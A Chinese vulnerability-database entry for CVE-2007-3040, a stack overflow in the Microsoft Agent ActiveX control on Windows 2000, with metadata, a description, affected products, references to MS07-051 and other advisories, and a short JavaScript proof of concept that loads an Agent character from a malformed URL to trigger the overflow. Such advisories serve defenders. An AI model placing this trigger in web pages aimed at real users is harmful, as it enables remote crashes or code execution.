Microsoft Agent agentdpv.dll ActiveX控件畸形URL栈溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113609 漏洞类型 缓冲区溢出
发布时间 2007-09-11 更新时间 2009-04-21
CVE编号 CVE-2007-3040 CNNVD-ID CNNVD-200709-120
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/30567
https://www.securityfocus.com/bid/25566
https://cxsecurity.com/issue/WLB-2007090042
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200709-120
|漏洞详情
MicrosoftWindows是美国微软(Microsoft)公司发布的一系列操作系统。Windows系统所带的AgentActiveX控件实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。Windows操作系统所安装的MicrosoftAgentActiveX控件用于使用动画人物引导用户了解如何使用计算机,该ActiveX控件注册如下:文件:agentdpv.dllProgID:Agent.ControlCLASSID:D45FD31B-5C6E-11D1-9EC1-00C04FD7081FMicrosoftAgent控件处理某些特制URL的方式存在栈溢出漏洞,如果用户受骗访问了恶意网页的话攻击者就可以在受影响的系统上远程执行指令。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。
|漏洞EXP
source: http://www.securityfocus.com/bid/25566/info

Microsoft Agent (agentsvr.exe) is prone to a stack-based buffer-overflow vulnerability because the application fails to adequately bounds-check user-supplied data.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial-of-service conditions. 

<script language="javascript">
function document::OnClick() {
        var agent, character, url;
        agent = new ActiveXObject("Agent.Control.2");
        agent.connected = true;
        agent.Characters.Load("Genie", "http:///");
        character = agent.Characters.Character("Genie");
        character.Show();
        character.Think ("brazil owns!");
        character.Speak('brazil owns!');
        character.Play('Processing');
}
</script>
|受影响的产品
Microsoft Windows 2000 Server SP4 Microsoft Windows 2000 Server SP3 Microsoft Windows 2000 Server SP2 Microsoft Windows 2000 Server SP1 Microsoft Windows 2000 Professional SP4
|参考资料

来源:US-CERT
名称:TA07-254A
链接:http://www.us-cert.gov/cas/techalerts/TA07-254A.html
来源:US-CERT
名称:VU#716872
链接:http://www.kb.cert.org/vuls/id/716872
来源:BUGTRAQ
名称:20070911AssurentVR-MicrosoftAgentCraftedURLStackBufferOverflow
链接:http://www.securityfocus.com/archive/1/archive/1/479096/100/0/threaded
来源:MS
名称:MS07-051
链接:http://www.microsoft.com/technet/security/Bulletin/MS07-051.mspx
来源:VUPEN
名称:ADV-2007-3113
链接:http://www.frsirt.com/english/advisories/2007/3113
来源:SECUNIA
名称:26753
链接:http://secunia.com/advisories/26753
来源:XF
名称:ms-agent-url-code-execution(35752)
链接:http://xforce.iss.net/xforce/xfdb/35752
来源:BID
名称:25566
链接:http://www.securityfocus.com/bid/25566
来源:OSVDB
名称:36934
链接:http://www.osvdb.org/36934
来源:SECTRACK
名称:1018677
链接:http://securitytracker.com/id?1018677
来源:SREASON
名称:3124
链接:http://securityreason.com/securityalert/3124
来源:IDEFENSE
名称:20070911MicrosoftWindows2000AgentURLCanonicalizingStackBasedBufferOverflowVulnerability
链接:http://labs.idefense.com/intelligence/vulnerabil